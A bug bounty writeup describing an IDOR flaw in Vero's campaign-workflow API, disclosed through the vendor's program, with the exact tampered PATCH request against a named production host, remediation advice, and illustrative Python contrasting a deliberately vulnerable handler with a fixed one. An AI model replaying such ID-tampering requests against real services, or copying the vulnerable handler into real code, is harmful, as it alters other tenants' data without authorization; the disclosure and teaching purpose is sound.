Hi, I'm Hasan Khan, a web application penetration tester and security researcher, and a bug bounty hunter from Bangladesh. I specialize in ethical hacking, vulnerability analysis, and dynamic application security testing. While testing the Vero platform, I discovered a critical Insecure Direct Object Reference (IDOR) vulnerability that allowed me to access and archive campaign workflows belonging to other users, simply by manipulating the workflow ID.

This writeup explains how I found the issue, its impact, and how it was responsibly disclosed. I'm proud to share that this vulnerability was rewarded with USD $150 by Vero's security team.

πŸ•΅οΈ Vulnerability Summary

The vulnerability was found in the following endpoint:

PATCH /api/v1/campaign-workflows/{workflow_id}

By replacing the workflow_id with another user's archived workflow ID, I was able to successfully archive or access their campaign workflow. The server responded with a 200 OK status, confirming the unauthorized action.

🧪 Steps to Reproduce

1. ✅ Normal Request (Archiving My Own Workflow)

This is a legitimate request to archive a campaign workflow that belongs to my account:

PATCH /api/v1/campaign-workflows/25351
Host: internal-api.app.getvero.com
Content-Type: application/vnd.api+json
{
  "data": {
    "attributes": {
      "active": false
    },
    "type": "campaign-workflows"
  }
}

📌 Result: The server responded with HTTP/2 200 OK, and my workflow with ID 25351 was successfully archived.

2. ❌ Tampered Request (Archiving Another User's Workflow)

By simply changing the workflow ID to another user's archived campaign (e.g., 25352), I was able to archive their workflow without any authorization checks:

PATCH /api/v1/campaign-workflows/25352

📌 Result: The server again responded with HTTP/2 200 OK, and returned the following data:

{
  "data": {
    "id": "25352",
    "type": "campaign-workflows",
    "attributes": {
      "title": "Other User's Campaign",
      "active": false,
      ...
    }
  }
}

✅ This confirmed that I could access and modify another user's archived campaign workflow, demonstrating a clear IDOR vulnerability.

⚠️ Impact

  • Any authenticated user could archive, view, or potentially modify workflows belonging to other accounts.
  • This exposes sensitive business logic, marketing strategies, and workflow data.
  • In a multi-tenant SaaS environment, this is a critical vulnerability that breaks tenant isolation.

✅ Recommendations

To prevent this vulnerability, I recommend:

  • Implementing object-level authorization checks to verify ownership before processing requests.
  • Using opaque or randomized identifiers instead of predictable numeric IDs.
  • Logging and monitoring access patterns to detect suspicious behavior.
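As an added illustration of the first recommendation (this is example code, not Vero's; the handler names, account IDs and the in-memory store are constructed), here is a lookup-by-ID handler with the IDOR beside one scoped to the caller's tenant:

```python
import logging
from dataclasses import dataclass

log = logging.getLogger("campaign-workflows")

@dataclass
class Workflow:
    id: int
    account_id: int   # owning tenant
    title: str
    active: bool = True

def make_store():
    """Constructed sample data: the two IDs from the writeup, owned by two tenants."""
    return {
        25351: Workflow(25351, account_id=1, title="My Campaign"),
        25352: Workflow(25352, account_id=2, title="Other User's Campaign"),
    }

def _serialize(wf):
    return {"data": {"id": str(wf.id), "type": "campaign-workflows",
                     "attributes": {"title": wf.title, "active": wf.active}}}

def patch_workflow_vulnerable(store, caller_account_id, workflow_id, attributes):
    """Authenticated but not authorized: the row is fetched by ID alone, so any
    caller who supplies another tenant's numeric ID can archive that workflow."""
    wf = store.get(workflow_id)
    if wf is None:
        return 404, {"errors": [{"status": "404", "title": "Not Found"}]}
    wf.active = bool(attributes.get("active", wf.active))
    return 200, _serialize(wf)

def patch_workflow_fixed(store, caller_account_id, workflow_id, attributes):
    """Object-level authorization: the lookup is scoped to the caller's tenant.
    A foreign ID gets the same 404 as a missing one, so the response does not
    confirm that other tenants' IDs exist, and the denial is logged for monitoring."""
    wf = store.get(workflow_id)
    if wf is None or wf.account_id != caller_account_id:
        log.warning("denied PATCH workflow=%s by account=%s", workflow_id, caller_account_id)
        return 404, {"errors": [{"status": "404", "title": "Not Found"}]}
    wf.active = bool(attributes.get("active", wf.active))
    return 200, _serialize(wf)

if __name__ == "__main__":
    # Account 1 replays the writeup's tampered request against workflow 25352.
    print(patch_workflow_vulnerable(make_store(), 1, 25352, {"active": False})[0])  # 200
    print(patch_workflow_fixed(make_store(), 1, 25352, {"active": False})[0])       # 404
```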

πŸ“ Vulnerability Disclosure Program & Reward

I reported this vulnerability to Vero's security team through their Vulnerability Disclosure Program. They classified it as a P3 (medium severity) and awarded me USD $150 for being the first to report it. I appreciate their quick response and professionalism.

📩 Here's a snippet from their response:

> "You are the first to report this vulnerability. We reward P3 tickets at USD $150. Thank you for reporting this finding and for your hard work—we absolutely appreciate it!"


🎯 Final Thoughts

This finding reinforces the importance of access control validation in API endpoints. Even simple ID manipulation can lead to serious data exposure if authorization checks are missing. I encourage developers to audit their APIs regularly and bug bounty hunters to keep exploring responsibly.

🌐 Follow Me

If you found this writeup helpful or inspiring, follow me for more vulnerability reports, security guides, and community resources:

- LinkedIn: https://www.linkedin.com/in/hasankhan0x
- Twitter (X): https://twitter.com/Hasan_Khan0X